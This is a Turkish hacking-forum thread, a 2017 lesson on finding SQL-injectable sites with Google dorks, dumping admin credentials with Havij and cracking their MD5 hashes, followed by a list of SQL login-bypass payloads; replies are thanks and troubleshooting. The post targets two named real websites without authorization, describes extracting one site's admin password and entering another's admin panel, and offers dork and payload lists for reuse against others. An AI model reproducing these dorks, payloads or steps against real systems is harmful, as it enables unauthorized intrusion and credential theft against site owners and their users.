1. Ayyıldız Tim forumu Hariç Hiç Bir şekilde Rütbeli Oldugunu İddaa edenlere inanmayınız..⠀ Ayyıldız Tim Adına Sizden Bilgi Belge TC Kimlik Vb Evrak İsteyenlere Asla Bilgilerinizi Vermeyiniz.

1. Düzey Hack Dersleri #6-sql Dork - Sql Bypass - Havij Kullanımı

'Web Hacking ve Güvenlik' forumunda ERVAH-I-EZEL tarafından 19 Mayıs 2017 tarihinde açılan konu

  1. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,785

    Özel Mesaj
    Selâmün Aleyküm devrelerim. Hack Derslerinde kaldığımız yerden devam edeceğiz. Önceki dersimizde büyük bir web güvenlik açığı olan SQL Açığı'nı kullanmayı
    sizlere gösterdim.

    1. Düzey Hack Dersleri #1-Başlangıç
    1. Düzey Hack Dersleri #2-Temel Hack Terimleri
    1. Düzey Hack Dersleri #3-Brute Force ve İlgili Hack Terimleri
    1. Düzey Hack Dersleri #4-Rte ve Upload Açıklarını Kullanarak Site Hackleme
    1. Düzey Hack Dersleri #5-SQL Açığı Kullanımı

    Bu dersimizde ise SQL Açığı ile ilgili 3 önemli şey daha öğrenip SQL Açığını bitireceğiz. Devam edelim...

    1- Sql Dorklar Yazma

    Önceki dersimizde Sql Açığını kullanmayı öğretirken kullandığım siteyi internette bulduğum "Sql Açıklı Siteler" ile ilgili konuların birinden aldım. Yalnız bu hazır siteler
    bir süre sonra işimize yaramamaya başlıyor çünkü çoğu kaynakta birkaç tanesi dışında aynı siteler var. Bu yüzden kendi sitemizi kendimiz bulmayı öğrenmeliyiz.

    1- Kullanmamız gereken kalıp sözcüğümüzü yazıyoruz:

    Kod:
    inurl:
    2- Önceki konularda öğrendiğimiz Wordpress dorklarında yaptığımız gibi kalıp kelimenin yanına istediğimiz bir kelime yazmamız gerekiyor. Karşımıza o kelimenin içinde bulunduğu siteler gözükecek. "Google Çeviri" kullanarak istediğiniz dile çeviri yapabilirsiniz. Basit bir kelime kullanacağım: "makale" : İngilizce olarak: "article" Çok sık kullanılan dorklardandır.
    Kod:
    inurl:article
    3- Kelimemizin yanına ".asp?" veya ".aspx" ya da ".php?" yazmamız gerekiyor. (.Asp, (.Aspx) ve .Php sunucu dilleridir. Detaylı bilgi için forumumuzda konular mevcut.) Ben Php seçeceğim.
    Kod:
    inurl:article.php?
    4- Son olarak ikinci kalıp sözcüğümüzü (id=) dorkumuza ekliyoruz.
    Kod:
    inurl:article.php?id=
    Basit bir dork oluşturmuş olduk ama dorkumuzu geliştirebiliriz.

    4- Eğer dorkumuzu arattığımızda sadece belli bir ülkeye ait sonuçların çıkmasını istiyorsak "site:" kalıbı yanına ülke uzantısını ekleyebiliriz. Ülke uzantılarını internette bulabilirsiniz.
    Örnek olması açısından ".uk" İngiltere'nin site uzantısıdır. Aşağıdaki kodu yazdığımızda sadece İngiltere'ye ait "makale" sözcüğü içeren siteleri aratmış olacağız.

    Kod:
    inurl:article.php?id= site:.uk

    5- Bir de özel saldırılar yapmak için ekleme yapabiliriz. Sizin de bildiğiniz gibi web sitelerin sonunda ".com" , ".org" , ".gov" gibi uzantılar vardır. Bunların anlamlarını da internette bulabilirsiniz, örnek olarak; ".org" ticari kâr amacı taşımadan hizmet veren organizasyon sitelerince kullanılmaktadır.

    Kod:
    inurl:article.php?id= .org

    6- İstersek aynı anda hem özel saldırı hem de ülke saldırısında bulabiliriz. İstediğimiz ülke uzantısını ekleyelim:

    Kod:
    inurl:article.php?id= .org.uk

    Gelişmiş bir SQL dork yazmış olduk böylece. Yalnız şuna dikkat edin, şimdi bu dorku Google ya da Yandex vs. arattığımızda çıkan siteler SQL Açıklı olmuyor. "SQL Açığı Olma Olasılığı"'na sahip oluyor. Artık tek yapmanız gereken karşınıza çıkan sitelere girip site sonlarına tırnak işareti ( ' ) bırakmak olacaktır. Eğer hata alırsanız sitede SQL Açığı vardır.

    2- Havij Programı Kullanımı

    Havij programı bir SQL Enjeksiyon yani SQL Açıklı bir sitedeki veriyi otomatik olarak hızlı bir şekilde çekmeye yarayan programdır. Program sizin şimdiki bilginize göre biraz daha iyi sonuç alabiliyor. Ayrıca içerisinde "Admin Panel Bulucu" , "Md5 Kırıcı" araçlar da barındıran güzel bir yazılımdır. Programın arayüzü gayet basit olmakla beraber profesyoneller için gelişmiş ayarları da barındırıyor. Program Arayüzü:

    [​IMG]

    Önceki derste uygulama yaptığımız siteyi kullanacağız yine. Böylece yaptığımız işlemlerin doğruluğunu kanıtlarız.
    Site: http://musculoskeletalsociety.in/
    Sql Açığı Bulunan Sayfa: http://musculoskeletalsociety.in/page.php?id=5

    İlk önce "Target" bölümüne Sql Açığı tespit ettiğimiz sayfanın linkini yazıp hemen yanındaki "Analyze" butonuna basıyoruz. Program alt taraftaki bölümde işlemleri tek tek yapacaktır.

    [​IMG]

    Eğer işlem başarılı olursa ki bu sitede başarılı oldu zaten; sağ taraftaki "Tables" bölümüne giriyoruz. Sonra karşımıza görünen veritabanını (culosmus_muscul) seçip "Get Tables" butonuna tıklıyoruz. Karşımıza seçenekler açılıyor.

    [​IMG]

    Yönetici bilgileri "user" , "administrator" , "admin" gibi seçeneklerden çıkar. Ben zaten "admin" seçeneğini bulduğuma göre seçeneği işaretleyip "Get Columns" düğmesine basabilirim.

    [​IMG]

    Burada "user_id" ve "password" seçenekleri "Ben Buradayım!" der gibi sırıttığına göre ( :D ) kullanıcı adını ve parolayı "Get Data" butonuna basarak ele geçiriyorum.

    [​IMG]

    Demek ki önceki derste yaptığımız işlemler doğruymuş. Kullanıcı adını ve parolayı ele geçirdikten sonra sağdan "Find Admin" seçeneğine tıklayıp "start" düğmesine basarak da admin panelini bir güzel buluyorum.

    [​IMG]

    Karşınıza bu resimdeki gibi birden fazla seçenek sunabilir. Bazıları hatalıdır, bazı panellerde kullanıcı adı ve şifre uyuşmaz. Böylece doğru paneli bulursunuz.

    Son olarak "MD5" seçeneğine karşımıza çıkan şifreyi girelim. Program bazı md5 kırıcı sitelere otomatik veri gönderip eğer şifre bulunursa karşımıza çıkaracaktır.

    [​IMG]

    Bu arada Md5 şifremizi bulduk. Ama sakın ümitlenmeyin, ben aldım bile.

    3- Bypass İle Site Hackleme

    Bu da SQL Açığı'nın bir türüdür. Merak etmeyin, zor bir şey değil. Öncelikle "Bypass" kelimesinin ne anlama geldiğini tekrar hatırlayalım.

    _______________________________________________________________________________________

    Bypass:

    Gerçek anlamı alternatif yoldan geçerek asıl yolu atlatmaktır. Hack alanındaki kullanımı ise belirli karakterler yardımıyla gidilecek yolu geçiştirmektir.
    Örnek olarak bir admin paneli Bypass yöntemi ile atlatılabilir.

    _______________________________________________________________________________________

    Buna göre ilk yapmamız gereken bol bol admin paneli araştırmak. Bunun için admin panel dorklarını kullanabilir veya kendi dorklarınızı yazabilirsiniz.

    Kod:
    inurl:adminlogin.aspx
    inurl:adminlogin.asp
    inurl:adminlogin.php
    inurl:/admin/login.aspx
    inurl:/admin/login.asp
    inurl:/admin/login.asp
    inurl:login.asp
    inurl:login.aspx
    inurl:login.php
    inurl:admin/index.aspx
    inurl:admin/index.asp
    inurl:admin/index.php

    Admin Panel Dorklarını nasıl yazacağınızı anlatma gereği duymuyorum artık. Örneklere göre anlarsınız zaten. Sadece Admin Panel Listelerini araştırın biraz. Buna göre farklı dorklar da üretebilirsiniz.

    Daha sonra girdiğiniz admin panellerinde aşağıdaki Bypass kodlarını tek tek deneyin.

    Kod:
    '=' 'or'
    1’or’1’=’1
    ‘ or 1=1 –
    1’or’1’=’1
    admin’–
    admin'--
    ” or 0=0 –
    or 0=0 –
    ‘ or 0=0 #
    ” or 0=0 #
    or 0=0 #
    ‘ or ‘x’=’x
    ” or “x”=”x
    ‘) or (‘x’=’x
    ‘ or 1=1–
    ” or 1=1–
    or 1=1–
    ‘ or a=a–
    ” or “a”=”a
    ‘) or (‘a’=’a
    “) or (“a”=”a
    hi” or “a”=”a
    hi” or 1=1 –
    hi’ or 1=1 –
    hi’ or ‘a’=’a
    hi’) or (‘a’=’a
    hi”) or (“a”=”)
    anything' OR 'x'='x

    Bu Bypass Komutlarından en sık bulunanı ilkidir: '=' 'or'

    Yapmanız gereken tek şey admin panelindeki kullanıcı adına da parola kısmına da Bypass Komutlarını yazmak. (İki bölüme de aynı Bypass Komutu gelmelidir.)
    Eğer işe yararsa herhangi bir kullanıcı adı ve parola kullanmadan admin sayfasına geçiş yapacaksınız. Bir örnek verelim:

    Site: http://www.i2t2.com/
    Admin Panel: http://www.i2t2.com/admin/login.php

    Username: '=' 'or'
    Password: '=' 'or'

    Gördüğünüz gibi sitenin paneline girebiliyoruz.

    Bu dersimizin de sonuna geldik devreler. Özellikle takip edenler için kendimi zorlayıp konuları hızlıca devam ettirmeye çalışıyorum. Beğenilerinizi ve güzel yorumlarınızı bekliyorum. Herkese iyi çalışmalar, iyi forumlar... ;)
     
  2. Darquesse Guest

    • Guest
    Katılım:
    7 Mayıs 2017
    Mesaj:
    226
    Alınan Beğeniler:
    140

    Özel Mesaj
    Eline sağlık devrem.
     
    ERVAH-I-EZEL bunu beğendi.
  3. TURANC1 Guest

    • Guest
    Katılım:
    12 Mayıs 2017
    Mesaj:
    132
    Alınan Beğeniler:
    70

    Özel Mesaj
    Eyvallah devrem.
     
    ERVAH-I-EZEL bunu beğendi.
  4. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,785

    Özel Mesaj
    Sağolun devrelerim. :)
     
    TURANC1 bunu beğendi.
  5. kaanbaser616 Guest

    • Guest
    Katılım:
    19 Ocak 2017
    Mesaj:
    19
    Alınan Beğeniler:
    12

    Özel Mesaj
    Eline koluna sağlık devrem Devamını Dört gözle bekliyoruz :) Ama kendini de fazla zorlamana gerek yok ne zaman istersen o zaman at Kolay gelsin..
     
    Xsahsiyet ve ERVAH-I-EZEL bunu beğendi.
  6. ismailkaya2 Guest

    • Guest
    Katılım:
    19 Aralık 2016
    Mesaj:
    953
    Alınan Beğeniler:
    805

    Özel Mesaj
    devrem sqlmap kullanımınıda anlatın hata ileri düzey kullanımını benim videom var istiosanız atıyım ondan bakarak felan gösterin bu arada elinize sağlık
     
    Xsahsiyet ve ERVAH-I-EZEL bunu beğendi.
  7. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,785

    Özel Mesaj
    Sağol devrem. :)

    Sağol devrem, SQL Map kullanmayı biliyorum ve onun için ileride konu açacağım. İstersen paylaş videonu, merak edenler izler. ;)
     
  8. oyuncu_king Atıldı

    • Guest
    Katılım:
    13 Ocak 2017
    Mesaj:
    133
    Alınan Beğeniler:
    134

    Özel Mesaj
    Eline sağlık devrem. :)

    Bence kendi konunu aç devrem, bazı kişiler yorumlara bakmıyorlar. Senin konuna bakar ve bilgilenirler yanlış anlama yani. ;)
     
    ismailkaya2 ve ERVAH-I-EZEL bunu beğendi.
  9. psikososyal Guest

    • Guest
    Katılım:
    13 Mayıs 2017
    Mesaj:
    45
    Alınan Beğeniler:
    25

    Özel Mesaj
    Event does not exist '', buda sql açığı olan sitelerin verdiği hatalardan birimidir devrem ?
     
  10. ismailkaya2 Guest

    • Guest
    Katılım:
    19 Aralık 2016
    Mesaj:
    953
    Alınan Beğeniler:
    805

    Özel Mesaj
    devrelerim bu video sesim kötü ve tam anlatamdım heralde siz onlara bakmayın heyecandan;) siz ne anladaığınıza bakın devrelerim
     
  11. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,785

    Özel Mesaj
    Ne yaptın da geldi bu hata? SQL Hatasına benzemiyor.
     
  12. ismailkaya2 Guest

    • Guest
    Katılım:
    19 Aralık 2016
    Mesaj:
    953
    Alınan Beğeniler:
    805

    Özel Mesaj
    devrem ama havij veya sqlmap ile incelemekte fayda var
     
  13. ismailkaya2 Guest

    • Guest
    Katılım:
    19 Aralık 2016
    Mesaj:
    953
    Alınan Beğeniler:
    805

    Özel Mesaj
    ama devrem çevirdiğimizde olay mevcut deil dioe yani sql açığı yok
     
  14. psikososyal Guest

    • Guest
    Katılım:
    13 Mayıs 2017
    Mesaj:
    45
    Alınan Beğeniler:
    25

    Özel Mesaj
    Devrem kullandığın siteyi havije yazıyorum finding database diyor ama tables da hiç bir şey yok ?
     
  15. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,785

    Özel Mesaj
    Havij Sürümü ne? 1.17 mi?
     
  16. psikososyal Guest

    • Guest
    Katılım:
    13 Mayıs 2017
    Mesaj:
    45
    Alınan Beğeniler:
    25

    Özel Mesaj
    evet devrem
     
  17. ERVAH-I-EZEL Guest

    • Guest
    Katılım:
    30 Ocak 2017
    Mesaj:
    1,333
    Alınan Beğeniler:
    4,785

    Özel Mesaj
  18. psikososyal Guest

    • Guest
    Katılım:
    13 Mayıs 2017
    Mesaj:
    45
    Alınan Beğeniler:
    25

    Özel Mesaj
  19. psikososyal Guest

    • Guest
    Katılım:
    13 Mayıs 2017
    Mesaj:
    45
    Alınan Beğeniler:
    25

    Özel Mesaj
    Bu hatanın sebebi nedir ?
     
  20. latheman Guest

    • Guest
    Katılım:
    19 Mayıs 2017
    Mesaj:
    15
    Alınan Beğeniler:
    8

    Özel Mesaj
    Gayret ve özverinize hayranım, teşekkürler..
     
    ERVAH-I-EZEL ve CaptainJackSparrow bunu beğendi.

Bu Sayfayı Paylaş